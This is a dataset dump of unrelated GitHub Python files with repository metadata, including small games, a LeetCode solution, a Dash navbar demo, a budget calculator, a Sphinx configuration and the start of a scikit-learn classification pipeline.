self.start_y = start_y\n self.color = color\n self.x = start_x\n self.y = start_y\n self.vel_x = 0\n self.vel_y = 0\n def move(self):\n if self.y == 0 or self.y == 6:\n self.vel_y *= -1\n if self.x == 0:\n #bot_score += 1\n #start_round()\n print(\"score!\")\n self.vel_x *= -1\n elif self.x == 7:\n #player_score += 1\n #start_round()\n print(\"score!\")\n self.vel_x *= -1\n elif not game_display[ ( self.x + self.vel_x ) + ( ( self.y + self.vel_x ) * 8 ) ] in [off, gray] :\n print(\"collsision\")\n self.x += self.vel_x\n self.y += self.vel_y\n\nball = Ball(1, 3, white)\nball.vel_x = 1\nball.vel_y = 1\n\nwhile True:\n sense.clear()\n ball.move()\n update_game_display()\n sense.set_pixels(game_display)\n time.sleep(.1)\n","repo_name":"jorgenmiller/SenseHat","sub_path":"pong/ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21452700215","text":"# -*- coding: utf-8 -*-\nclass Solution(object):\n def jump(self, nums):\n \"\"\"\n Solution: Greedy\n Time Complexity: O(n)\n Space Complexity: O(1)\n TP:\n - Using greedy to update farthest point we can reach at each jump\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums or len(nums)==1:\n return 0\n jump=nextfar=curfar=0\n m=len(nums)\n for i in range(m):\n nextfar=max(i+nums[i],nextfar)\n if nextfar >= m-1:\n return jump+1\n if i == curfar:\n jump+=1\n curfar=nextfar\n","repo_name":"jerrt2003/leetcode-in-python","sub_path":"45_Jump_Game_II/Greedy.py","file_name":"Greedy.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24307938802","text":"\"\"\"\nA simple app demonstrating how to manually construct a navbar with a customised\nlayout using the Navbar component and the supporting Nav, NavItem, NavLink,\nNavbarBrand, and NavbarToggler components.\nRequires dash-bootstrap-components 0.3.0 or later\n\"\"\"\nimport dash\nimport dash_bootstrap_components as dbc\nfrom dash import Input, Output, State, html\n\nPLOTLY_LOGO = \"https://images.plot.ly/logo/new-branding/plotly-logomark.png\"\n\napp = dash.Dash(external_stylesheets=[dbc.themes.BOOTSTRAP])\nnav_item = dbc.NavItem(dbc.NavLink(\"Link\", href=\"#\"))\n\n# make a reuseable dropdown for the different examples\ndropdown = dbc.DropdownMenu(\n children=[\n dbc.DropdownMenuItem(\"Entry 1\"),\n dbc.DropdownMenuItem(\"Entry 2\"),\n dbc.DropdownMenuItem(divider=True),\n dbc.DropdownMenuItem(\"Entry 3\"),\n ],\n nav=True,\n in_navbar=True,\n label=\"Menu\",\n)\n\n# this is the default navbar style created by the NavbarSimple component\ndefault = dbc.NavbarSimple(\n children=[nav_item, dropdown],\n brand=\"Default\",\n brand_href=\"#\",\n sticky=\"top\",\n className=\"mb-5\",\n)\n\n# here's how you can recreate the same thing using Navbar\n# (see also required callback at the end of the file)\ncustom_default = dbc.Navbar(\n dbc.Container(\n [\n dbc.NavbarBrand(\"Custom default\", href=\"#\"),\n dbc.NavbarToggler(id=\"navbar-toggler1\"),\n dbc.Collapse(\n dbc.Nav(\n [nav_item, dropdown], className=\"ms-auto\", navbar=True\n ),\n id=\"navbar-collapse1\",\n navbar=True,\n ),\n ]\n ),\n className=\"mb-5\",\n)\n\n# this example that adds a logo to the navbar brand\nlogo = dbc.Navbar(\n dbc.Container(\n [\n html.A(\n # Use row and col to control vertical alignment of logo / brand\n dbc.Row(\n [\n dbc.Col(html.Img(src=PLOTLY_LOGO, height=\"30px\")),\n dbc.Col(dbc.NavbarBrand(\"Simulador de Portfolio\", className=\"ms-2\")),\n ],\n align=\"center\",\n className=\"g-0\",\n ),\n href=\"https://www.entercapital.com.br/fundos?gclid=Cj0KCQjwsrWZBhC4ARIsAGGUJurewh14oGuAAFmJE7JiGhM52UfrYrCIZ2RAcdlnwn9s_jY1lcsYDO0aAgO7EALw_wcB\",\n style={\"textDecoration\": \"none\"},\n ),\n dbc.NavbarToggler(id=\"navbar-toggler2\", n_clicks=0),\n dbc.Collapse(\n dbc.Nav(\n [nav_item, dropdown],\n className=\"ms-auto\",\n navbar=True,\n ),\n id=\"navbar-collapse2\",\n navbar=True,\n ),\n ],\n ),\n color=\"dark\",\n dark=True,\n className=\"mb-5\",\n)\n\n\napp.layout = html.Div(\n logo\n)\n\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True, port=8000)","repo_name":"lucasaos52/demo-app3","sub_path":"debugg.py","file_name":"debugg.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22096957860","text":"###\n### Author: Xin Li\n### Description: In this PA, you will be writing a program\n### that helps a user visualize and understand how much money\n### they spend of various categories of expenditures.\n### Perhaps you will even find this program useful for your personal finances!\n### Name of this program is: wheres_the_money.py\n###\nprint('''-----------------------------\n----- WHERE'S THE MONEY -----\n-----------------------------''')\nfrom os import _exit as exit\nsalary = input('What is your annual salary?\\n')\nif salary.isnumeric()==True :\n salary=float(salary)\nelse:\n print('Must enter positive integer for salary.')\n exit (0)\nif salary < 0 :\n print('Must enter positive integer for salary.\\n')\n exit(0)\n\nrent = input('How much is your monthly mortgage or rent?\\n')\nif rent.isnumeric()==True :\n rent=float(rent)\nelse:\n print('Must enter positive integer for mortgage or rent.')\n exit(0)\nif rent < 0 :\n print('Must enter positive integer for mortgage or rent.')\n exit(0)\n\nbills = input('What do you spend on bills monthly?\\n')\nif bills.isnumeric()==True:\n bills=float(bills)\nelse:\n print('Must enter positive integer for bills.')\n exit(0)\nif bills < 0 :\n print('Must enter positive integer for bills.')\n exit(0)\n\nfood = input('What are your weekly grocery/food expenses?\\n')\nif food.isnumeric()==True:\n food=float(food)\nelse:\n print('Must enter positive integer for food.')\n exit(0)\nif food < 0 :\n print('Must enter positive integer for food.')\n exit(0)\n\ntravel = input('How much do you spend on travel annually?\\n')\nif travel.isnumeric()==True:\n travel=float(travel)\nelse:\n print('Must enter positive integer for travel.')\n exit(0)\nif travel < 0 :\n print('Must enter positive integer for travel.')\n exit(0)\n\n\nif salary > 200000 :\n tax_percent = 30\nelif 75000 < salary <= 200000 :\n tax_percent = 25\nelif 15000 < salary <= 75000 :\n tax_percent = 20\nelif 0 <= salary <= 15000 :\n tax_percent = 10\nsalary_tax = salary * (tax_percent / 100.0)\n\nrent = rent * 12\nbills = bills * 12\nfood = food * 52\ntax = salary_tax\nif tax >= 50000 :\n tax1 = 50000\nelse:\n tax1 = tax\nextra = salary - rent - bills - food - travel - tax1\nrent_percent = (rent / salary)*100.0\nbills_percent = (bills / salary)*100.0\nfood_percent = (food / salary)*100.0\ntravel_percent = (travel / salary)*100.0\ntax1_percent = (tax1 / salary)*100.0\nextra_percent = (extra / salary)*100.0\n\nsalary1 = format(salary, '10,.2f')\nrent = format(rent, '10,.2f')\nbills = format(bills, '10,.2f')\nfood = format(food, '10,.2f')\ntravel = format(travel, '10,.2f')\ntax1 = format(tax1,'10,.2f')\nextra = format(extra, '10,.2f')\nrent_percent1 = format(rent_percent, '6.1f')\nbills_percent1 = format(bills_percent, '6.1f')\nfood_percent1 = format(food_percent, '6.1f')\ntravel_percent1 = format(travel_percent, '6.1f')\ntax1_percent1 = format(tax1_percent, '6.1f')\nextra_percent1 = format(extra_percent, '6.1f')\n\n#compare the biggest\nif rent_percent > bills_percent :\n a = rent_percent\nelse:\n a = bills_percent\nif food_percent > travel_percent :\n b = food_percent\nelse:\n b = travel_percent\nif tax1_percent >extra_percent :\n c = tax1_percent\nelse:\n c = extra_percent\nif a > b :\n l = a\nelse:\n l = b\nif l > c :\n l = l\nelse:\n l = c\nl = int(l)\nprint(' ')\nprint('------------------------------------------'+'-'*l)\nprint('See the financial breakdown below, based on a salary of $',int(salary), sep='')\nprint('------------------------------------------'+'-'*l)\nprint('| mortgage/rent | $ ', rent,' |',rent_percent1,'%'+' '+'| '+'#'*int(rent_percent), sep='')\nprint('| bills | $ ', bills,' |',bills_percent1,'%'+' '+'| '+'#'*int(bills_percent), sep='')\nprint('| food | $ ', food,' |',food_percent1,'%'+' '+'| '+'#'*int(food_percent), sep='')\nprint('| travel | $ ', travel,' |',travel_percent1,'%'+' '+'| '+'#'*int(travel_percent), sep='')\nprint('| tax | $ ', tax1,' |',tax1_percent1,'%'+' '+'| '+'#'*int(tax1_percent), sep='')\nprint('| extra | $ ', extra,' |',extra_percent1,'%'+' '+'| '+'#'*int(extra_percent), sep='')\nprint('------------------------------------------'+'-'*l)\nif tax >= 50000 :\n print('>>> TAX LIMIT REACHED <<<')\nif int(extra_percent) < 0 :\n print('>>> WARNING: DEFICIT <<<')\n","repo_name":"xinli2/Where-s-The-Money","sub_path":"wheres_the_money.py","file_name":"wheres_the_money.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"2900929601","text":"from random import randint\n\naleatorio = randint(0, 10) # gera um número \"aleatorio\" entre 0 e 5\n\n# numero = int(input('Digite um número entre 0 e 10: '))\n# contador = 1\n\n# while numero != aleatorio:\n# # print('Você venceu!!')\n# contador += 1\n# numero = int(input('Digite um número entre 0 e 10: '))\n# else:\n# print('Você acertou!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n\n# if contador == 1:\n# print(f'Acertou depois de {contador} tentativa')\n# else:\n# print(f'Acertou depois de {contador} tentativas')\n\nacertou = False\npalpite = 0\n\nwhile not acertou:\n palpite += 1\n jogador = int(input('Digite seu palpite entre 0 e 10: '))\n if jogador == aleatorio:\n acertou = True\n else:\n if jogador < aleatorio:\n print('Mais...')\n elif jogador > aleatorio:\n print('Menos...')\n\nif palpite == 1:\n print(f'Acertou depois de {palpite} tentativa')\nelse:\n print(f'Acertou depois de {palpite} tentativas')\n\nprint('AÊ!!')\n","repo_name":"cecilia-martins/trybe-exercicios","sub_path":"ciencia-da-computacao/curso em video/ex058.py","file_name":"ex058.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73037026087","text":"import argparse\n\nfrom resspect.fit_lightcurves import fit_snpcc\nfrom resspect.fit_lightcurves import fit_plasticc\n\n__all__ = ['fit_dataset']\n\n\ndef fit_dataset(user_choices):\n \"\"\"Fit the entire sample with the Bazin function.\n\n All results are saved to file.\n\n Parameters\n ----------\n -o: str\n Path to output feature file.\n -s: str\n Simulation name. Options are 'SNPCC', 'RESSPECT' or 'PLAsTiCC'.\n -dd: str (optional)\n Path to directory containing raw data.\n Only used for SNPCC simulations.\n -hd: str (optional)\n Path to header file. Only used for PLASTICC simulations.\n -p: str (optional)\n Path to photometry file. Only used for PLASTICC simulations.\n -sp: str or None (optional)\n Sample to be fitted. Options are 'train', 'test' or None.\n Default is None.\n -n: int or None (optional)\n Number of cores to be used. If None all cores are used. \n Default is 1.\n -f: str (optional)\n Function used for feature extraction. Options are \"bazin\" and \"bump\".\n Default is \"bazin\". Only used for SNPCC for now.\n \n Examples\n --------\n\n For SNPCC: \n\n >>> fit_dataset.py -s SNPCC -dd -o \n\n For PLAsTiCC:\n\n >>> fit_dataset.py -s -p \n -hd -o \n \"\"\"\n\n # raw data directory\n data_dir = user_choices.input\n features_file = user_choices.output\n ncores = user_choices.ncores\n\n if user_choices.sim_name in ['SNPCC', 'snpcc']:\n # fit the entire sample\n fit_snpcc(path_to_data_dir=data_dir, features_file=features_file,\n number_of_processors=ncores, feature_extractor=user_choices.function)\n\n elif user_choices.sim_name in ['PLAsTiCC', 'PLASTICC', 'plasticc']:\n fit_plasticc(path_photo_file=user_choices.photo_file,\n path_header_file=user_choices.header_file,\n output_file=features_file,\n sample=user_choices.sample,\n number_of_processors=ncores)\n\n return None\n\n\ndef main():\n\n # get input directory and output file name from user\n parser = argparse.ArgumentParser(description='resspect - Fit Light curves module')\n \n parser.add_argument('-dd', '--datadir', dest='input',\n help='Path to directory holding raw data. Only used for SNPCC',\n required=False, default=' ')\n parser.add_argument('-hd', '--header', dest='header_file', \n help='Path to header file. Only used for PLASTICC.',\n required=False, default=' ')\n parser.add_argument('-o', '--output', dest='output', help='Path to output file.', \n required=True)\n parser.add_argument('-p', '--photo', dest='photo_file',\n help='Path to photometry file. Only used for PLASTICC.',\n required=False, default=' ')\n parser.add_argument('-s', '--simulation', dest='sim_name', \n help='Name of simulation (data set). ' + \\\n 'Options are \"SNPCC\" or \"PLAsTiCC\".',\n required=True)\n parser.add_argument('-sp', '--sample', dest='sample',\n help='Sample to be fitted. Options are \"train\", ' + \\\n ' \"test\" or None.',\n required=False, default=None)\n parser.add_argument('-n', '--number-of-processors', dest='ncores', \n help='Number of processors. Default is 1.',\n required=False, default=1)\n parser.add_argument('-f', '--function', dest='function', \n help='Function used for feature extraction.',\n required=False, default=\"bazin\")\n\n user_input = parser.parse_args()\n\n fit_dataset(user_input)\n\n\nif __name__ == '__main__':\n main()","repo_name":"COINtoolbox/RESSPECT","sub_path":"resspect/scripts/fit_dataset.py","file_name":"fit_dataset.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"134428753","text":"import numpy as np\nfrom collections import deque\n\nclass UTILCalculation:\n def __init__ (self, relations):\n self.RELATIONS = deque(relations)\n \n def projection(self, cube):\n return np.max(cube, axis=0)\n\n def join(self, r1,r2):\n return r1[:,:, None] + r2[:, None, :]\n\n\n def hypercube(self, R):\n proj = None\n if len(R) < 2:\n return np.asarray(R)\n\n try:\n # get first relation\n r1 = R.pop()\n # get second relation\n r2 = R.pop()\n\n proj = self.projection(self.join(r1,r2))\n\n R.append(proj)\n proj = self.hyperCube(R)\n except IndexError as index:\n print(index)\n\n return np.asarray(proj)","repo_name":"vassilispapadop/dcop","sub_path":"util_calculation.py","file_name":"util_calculation.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15657888827","text":"import os\nimport subprocess\nimport re\n\nmonths = {\"jan\": \"01\",\n \"feb\": \"02\",\n \"mar\": \"03\",\n \"apr\": \"04\",\n \"may\": \"05\",\n \"jun\": \"06\",\n \"jul\": \"07\",\n \"aug\": \"08\",\n \"sep\": \"09\",\n \"oct\": \"10\",\n \"nov\": \"11\",\n \"dec\": \"12\",\n }\n\n\ndef rename(oldname):\n for mon in months.keys():\n parts = oldname.split(mon)\n if len(parts) > 1:\n break\n else:\n raise ValueError(\"Doesn't match expected format\")\n\n day = parts[0]\n if len(day) < 2:\n day = \"0\" + day\n\n year = parts[1].split(\".\")[0]\n\n return \"meeting\" + year + months[mon] + day + \".md\"\n\n\ndef rename2(oldname):\n date = re.findall(\"[0-9]{6,6}\", oldname)[0]\n return \"20\" + date[:2] + \"-\" + date[2:4] + \"-\" + date[4:] + \".md\"\n\n\nfor old_nm in os.listdir():\n try:\n nm = rename2(old_nm)\n print(nm)\n subprocess.run((\"git\", \"mv\", old_nm, nm))\n except IndexError:\n next\n","repo_name":"clarkfitzg/phd_research","sub_path":"meetings/namer.py","file_name":"namer.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"43651642722","text":"\"\"\"Tester.py\r\n\"\"\"\r\nimport sys\r\nsys.path.append(\"C:\\\\temp\\\\blendertest\")\r\nfrom os import path\r\nfrom random import randint\r\nimport math\r\n\r\nfrom blend2data import *\r\nfrom svg import *\r\n\r\nSVG_DIR = \"c:\\\\temp\"\r\n\r\nif __name__ == \"__main__\":\r\n mesh = bpy.context.selected_objects[0].data\r\n svg_paths = []\r\n rotations = []\r\n sizes = []\r\n names = []\r\n translations = []\r\n for index, face in enumerate(mesh.polygons):\r\n rotation = get_rotation(face.normal)\r\n flat_face = flatten_face(face, mesh)\r\n trans = get_3d_location(flat_face)*100\r\n translations.append(trans)\r\n verts = relocate_face(flat_face)\r\n polygon = Polygon([vert * 100 for vert in verts])\r\n print(verts)\r\n sizes.append(polygon.get_size())\r\n svg = create_svg([polygon])\r\n name = path.join(SVG_DIR, \"face_{0}.svg\".format(index))\r\n open(name, \"wb\").write(svg.encode(\"ascii\"))\r\n svg_paths.append(name)\r\n rotations.append(rotation)\r\n names.append(\"face_{0}.svg\".format(index))\r\n \r\n open(path.join(SVG_DIR, \"index.html\"), \"wb\").write(\"\"\"\r\n \r\n {0}\r\n \r\n \r\n \"\"\".format(\"\\n\".join(\r\n \"
\".format(\r\n math.degrees(r[0]),\r\n math.degrees(r[2]), \r\n p,\r\n s[0], \r\n s[1],\r\n (\"#{0:02x}{1:02x}{2:02x}\".format(randint(0, 256)%0xff,randint(0, 256)%0xff,randint(0, 256)%0xff)),\r\n \"{0:0.3f}px,{1:0.3f}px,{2:0.3f}px\".format(t.x,t.y,t.z)\r\n ) for\r\n r,p,s,t in zip(rotations,names, sizes,translations))).encode(\"ascii\"))","repo_name":"tmr232/blend2html","sub_path":"tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3964033700","text":"'''\nFinal Project - CSC 101 0502[66785] (Borough of Manhattan CC)\n\nStudent Name - Ahmed Soliman\n'''\n\ndef remove_new_line_char_from_list (lst):\n i= 0\n while i element on each page for social media\n \"sphinxext.opengraph\",\n # enable writing in markdown rather than reStructuredText\n \"myst_parser\",\n # add copy button to code blocks\n \"sphinx_copybutton\",\n # enable autogenerating API reference sections\n \"sphinx.ext.autodoc\", # core library rst->html\n \"sphinx.ext.autosummary\", # library for recursive generation of rst\n # enables parsing of docstrings using .. automodule, .. autoclass,\n # and .. autofunction directives\n \"sphinx.ext.autodoc\",\n # enables :ref: directives to link to subheadings in the same/different documents\n # see https://sublime-and-sphinx-guide.readthedocs.io/en/latest/references.html#links-to-sections-in-the-same-document\n \"sphinx.ext.autosectionlabel\",\n # in docstrings, references to modules/classes/functions become hyperlinks\n # to those sphinx documentation pages; in this way, we can connect documentation\n # for our dependencies to *our* documentation--as long as the other project\n # has a hosted Sphinx page somewhere\n \"sphinx.ext.intersphinx\",\n \"sphinx.ext.todo\",\n \"sphinx.ext.viewcode\",\n \"sphinx.ext.coverage\",\n \"sphinx.ext.doctest\",\n \"sphinx.ext.ifconfig\",\n \"sphinx.ext.mathjax\",\n # \"sphinx.ext.imgmath\", # requires latex CLI\n \"sphinx.ext.napoleon\",\n # enable generating images from .drawio diagram files\n \"sphinxcontrib.drawio\",\n]\n\n# fontawesome icons\n# html_css_files = [\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css\"]\n\n# paths relative to _static/\nhtml_css_files = [\n \"css/external-links.css\",\n \"css/admonition-fonts.css\",\n \"css/remove-formatting.css\",\n]\nhtml_js_files = [\n \"js/remove-readthedocs-versions.js\",\n]\n\n\ndef is_mac_os():\n \"\"\"Return ``True`` if this script is being run on MacOS.\"\"\"\n system = platform.system().lower()\n\n # is_windows = system == \"windows\"\n # is_linux = system == \"linux\"\n is_mac = system == \"darwin\"\n\n return is_mac\n\n\n# drawio_binary_path = \"/usr/local/bin/drawio\"\ndrawio_binary_path = \"/Applications/draw.io.app/Contents/MacOS/draw.io\" if is_mac_os() else \"/opt/drawio/drawio\"\ndrawio_no_sandbox = not is_mac_os()\ndrawio_headless = \"auto\"\n\nautosummary_generate = True # Turn on sphinx.ext.autosummary\n\n# suppressable warnings here: https://www.sphinx-doc.org/en/master/usage/configuration.html#confval-suppress_warnings\nsuppress_warnings = [\n # suppress \"duplicate label\" warnings; these prevented us from having\n # headers anywhere in the sphinx document with the same name\n \"autosectionlabel.*\"\n]\n\n\n# open graph extension config\nogp_site_url = \"https://docs.rootski.io/\"\nogp_image = \"https://www.rootski.io/rootski-io-preview-image.jpg\" # preview image\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = [\"_templates\"]\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This pattern also affects html_static_path and html_extra_path.\nexclude_patterns = []\n\n\n# -- Options for HTML output -------------------------------------------------\n\nhtml_favicon = \"favicon.ico\"\nhtml_logo = \"logo.svg\"\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\n#\nhtml_theme = \"furo\"\nhtml_title = \"Knowledge Base\"\nlanguage = \"en\"\n\nhtml_css_files += [\n \"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/fontawesome.min.css\",\n \"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/solid.min.css\",\n \"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/brands.min.css\",\n]\n\nhtml_theme_options: Dict[str, Any] = {\n # \"announcement\": \"Important announcement!\",\n \"sidebar_hide_name\": True,\n \"footer_icons\": [\n {\n \"name\": \"GitHub\",\n \"url\": \"https://github.com/rootski-io/rootski\",\n \"html\": \"\",\n \"class\": \"fab fa-github fa-2x\",\n },\n {\n \"name\": \"LinkedIn\",\n \"url\": \"https://www.linkedin.com/company/rootski/\",\n \"html\": \"\",\n \"class\": \"fab fa-linkedin fa-2x\",\n },\n {\n \"name\": \"YouTube Playlist\",\n \"url\": \"https://www.youtube.com/playlist?list=PLwF2z4Iu4rabmY7RbRNetjZprLfe8qWNz\",\n \"html\": \"\",\n \"class\": \"fab fa-youtube fa-2x\",\n },\n {\n \"name\": \"Slack\",\n \"url\": \"https://join.slack.com/t/rootskiio/shared_invite/zt-13avx8j84-mocJVx5wFAGNf5wUuy07OA\",\n \"html\": \"\",\n \"class\": \"fab fa-slack fa-2x\",\n },\n ]\n}\n\n# configure the \"pencil\" (edit in GitHub) button; we must pretend that\n# we use READTHEDOCS to do this, because the Furo theme only officially\n# supports ReadTheDocs+GitHub for this feature as of March 2022.\nhtml_context = {}\nhtml_context[\"READTHEDOCS\"] = True\nhtml_context[\"current_version\"] = \"latest\"\nhtml_context[\"conf_py_path\"] = \"/docs/source/\"\nhtml_context[\"display_github\"] = True\nhtml_context[\"github_user\"] = \"rootski-io\"\nhtml_context[\"github_repo\"] = \"rootski\"\nhtml_context[\"github_version\"] = \"trunk\"\nhtml_context[\"slug\"] = \"rski\"\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = [\"_static\"]\n\n\n# -- External mapping --------------------------------------------------------\npython_version = \".\".join(map(str, sys.version_info[0:2]))\n# intersphinx_mapping = {\n# \"sphinx\": (\"http://www.sphinx-doc.org/en/stable\", None),\n# \"python\": (\"https://docs.python.org/\" + python_version, None),\n# \"matplotlib\": (\"https://matplotlib.org\", None),\n# \"numpy\": (\"https://docs.scipy.org/doc/numpy\", None),\n# \"sklearn\": (\"https://scikit-learn.org/stable\", None),\n# \"pandas\": (\"https://pandas.pydata.org/pandas-docs/stable\", None),\n# \"scipy\": (\"https://docs.scipy.org/doc/scipy/reference\", None),\n# \"sqlalchemy\": (\"https://docs.sqlalchemy.org/en/stable/\", None),\n# \"aws_cdk\": (\"https://docs.aws.amazon.com/cdk/api/latest/python/\", None),\n# }\n","repo_name":"rootski-io/rootski","sub_path":"docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":7812,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"53"} +{"seq_id":"18455394672","text":"from datetime import date, datetime, timedelta\n\n\nclass TimeEntry:\n\n def __init__(\n self,\n time_date: date,\n time_type: str,\n start: datetime,\n end: datetime,\n duration: timedelta,\n comment: str\n ):\n self.time_date = time_date\n self.time_type = time_type\n self.start = start\n self.end = end\n self.duration = duration\n self.comment = comment\n","repo_name":"ChrisOe/timetracking_txt_convert","sub_path":"timetracking_txt_convert/timeentry.py","file_name":"timeentry.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18246645230","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import StandardScaler, LabelEncoder\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.model_selection import RepeatedStratifiedKFold, GridSearchCV\nfrom sklearn.metrics import roc_curve, roc_auc_score\n\nfrom lightgbm import LGBMClassifier\nfrom xgboost import XGBClassifier\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.ensemble import HistGradientBoostingClassifier\nfrom sklearn.dummy import DummyClassifier \n\n\nTRAIN_PATH = 'data/task1_train_v4.csv'\nTEST_PATH = 'data/task1_test_v4.csv'\nPREDICTIONS_FOLDER = 'answer/'\nSCORING = 'matthews_corrcoef' #'roc_auc'\nCV_FOLDS = 5\nCATEGORICAL_FEATURES = ['stat_2']\nLGBM_PARAM_GRID = {'num_leaves': [31, 63, 127],\n 'learning_rate': [0.05, 0.1, 0.2],\n 'n_estimators': [150, 175, 200],\n 'min_child_samples': [10, 20, 30],\n 'reg_alpha': [0, 1, 10],\n 'reg_lambda': [0, 1, 10],\n 'verbose':[-1]}\nXGB_PARAM_GRID = {'learning_rate': [0.05, 0.1, 0.2],\n 'max_depth': [3, 5, 7],\n 'n_estimators': [50, 100, 200],\n 'subsample': [0.5, 0.7, 1.0],\n 'colsample_bytree': [0.5, 0.7, 1.0],\n 'gamma': [0, 0.1, 0.2],}\nLGBM_BEST_PARAMS = {'learning_rate': 0.05,\n 'min_child_samples': 30,\n 'n_estimators': 150,\n 'num_leaves': 127,\n 'reg_alpha': 1,\n 'reg_lambda': 0,\n 'verbose':-1,\n 'objective': 'binary'}\nXGB_BEST_PARAMS = {'colsample_bytree': 0.7,\n 'gamma': 0,\n 'learning_rate': 0.05,\n 'max_depth': 7,\n 'n_estimators': 200,\n 'subsample': 0.7}\nCLASSIFIERS_NAN_TOLERANT = [LGBMClassifier(**LGBM_BEST_PARAMS),\n XGBClassifier(**XGB_BEST_PARAMS),\n HistGradientBoostingClassifier(),\n DecisionTreeClassifier(),\n DummyClassifier(strategy=\"most_frequent\"),]\nCLASSIFIERS_NAN_INTOLERANT = [\n RandomForestClassifier(),\n GradientBoostingClassifier(),\n KNeighborsClassifier(),\n GaussianNB(),\n LogisticRegression(),]\nBEST_CLASSIFIER = LGBMClassifier(**LGBM_BEST_PARAMS)\n\n\ndef explore_data(data:pd.DataFrame) -> None:\n \"\"\" Проведем исследовательский анализ данных \"\"\"\n print(f\"Размерность данных:\\n{data.shape}\")\n print(f\"\\nТипы данных:\\n{data.dtypes}\")\n print(f\"\\nОписательная статистика:\\n{data.describe()}\")\n print(f\"\\nПервые строчки:\\n{data.head()}\")\n print(f\"\\nКоличество уникальных значений:\\n{data.nunique()}\")\n print(f\"\\nКоличество пропущенных значений:\\n{data.isnull().sum()}\")\n print(f\"\\nРаспределение по классам:\\n{data['y'].value_counts()}\\n\")\n\n\ndef replace_missing_with_avg(df:pd.DataFrame) -> pd.DataFrame:\n \"\"\" Заменим пропущенные значения средними значениями по столбцам. \"\"\"\n for col in df.columns:\n if df[col].dtype != 'object':\n avg = df[col].mean()\n df[col].fillna(avg, inplace=True)\n return df\n\n\ndef replace_missing_with_normal(data:pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n Заменим пропущенные значения нормальным распределением по столбцам.\n \"\"\"\n for col in data.columns:\n if data[col].dtype != 'object':\n mean = data[col].mean()\n std = data[col].std()\n null_count = data[col].isnull().sum()\n if null_count > 0:\n null_idx = data[col].isnull()\n data.loc[null_idx, col] = np.random.normal(loc=mean,\n scale=std,\n size=null_count)\n return data\n\n\ndef detect_and_remove_outliers(data:pd.DataFrame) -> pd.DataFrame:\n \"\"\" Распознаем и удалим аутлаеры \"\"\"\n len_before = data.shape[0] # Сохраним количество строк до удаления\n for col in data.columns:\n if data[col].dtype != 'object':\n z_scores = np.abs((data[col] - data[col].mean()) / data[col].std())\n data = data[z_scores <= 3]\n print(f\"Удалено {len_before - data.shape[0]} строк с аутлаерами\")\n return data\n\n\ndef split_xy(data:pd.DataFrame) -> pd.DataFrame:\n \"\"\" Разделяем фичи, результаты \"\"\"\n X = data.drop('y', axis=1)\n y = data['y']\n return X, y\n\n\ndef encode_categorical_data(X_train:pd.DataFrame,\n X_test:pd.DataFrame,\n categorical_features:list) -> tuple:\n \"\"\"\n Закодируем категориальные признаки с помощью LabelEncoder из scikit-learn.\n \"\"\"\n X_train_encoded = X_train.copy()\n X_test_encoded = X_test.copy()\n\n for feature in categorical_features:\n X_train_encoded = X_train_encoded.astype({feature: str})\n X_test_encoded = X_test_encoded.astype({feature: str})\n le = LabelEncoder()\n le.fit(X_train[feature])\n X_train_encoded[feature] = le.transform(X_train[feature])\n X_test_encoded[feature] = le.transform(X_test[feature])\n \n return X_train_encoded, X_test_encoded\n\n\ndef scale_data(X_train:pd.DataFrame,\n X_test:pd.DataFrame,\n categorical_features:list) -> pd.DataFrame:\n \"\"\" Нормализуем фичи, отдельно трейн и тест чтобы избежать \"утечек\" \"\"\"\n scaler = StandardScaler()\n numerical_features = X_train.columns.difference(categorical_features)\n X_train[numerical_features]=scaler.fit_transform(X_train[numerical_features])\n X_test[numerical_features]=scaler.transform(X_test[numerical_features])\n return X_train, X_test\n\n\ndef 